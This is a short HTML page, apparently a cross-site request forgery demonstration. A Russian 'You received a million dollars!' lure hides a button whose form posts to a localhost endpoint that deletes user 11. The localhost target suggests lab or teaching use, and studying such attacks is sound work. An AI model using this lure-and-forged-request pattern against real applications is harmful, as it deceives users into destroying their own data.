<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Приз!</title>
</head>
<body>
<h1>Вы получили миллион долларов!</h1>
<form method="post" action="http://localhost/users/11/delete">
    <input type="submit" value="Забрать!">
</form>
</body>
</html>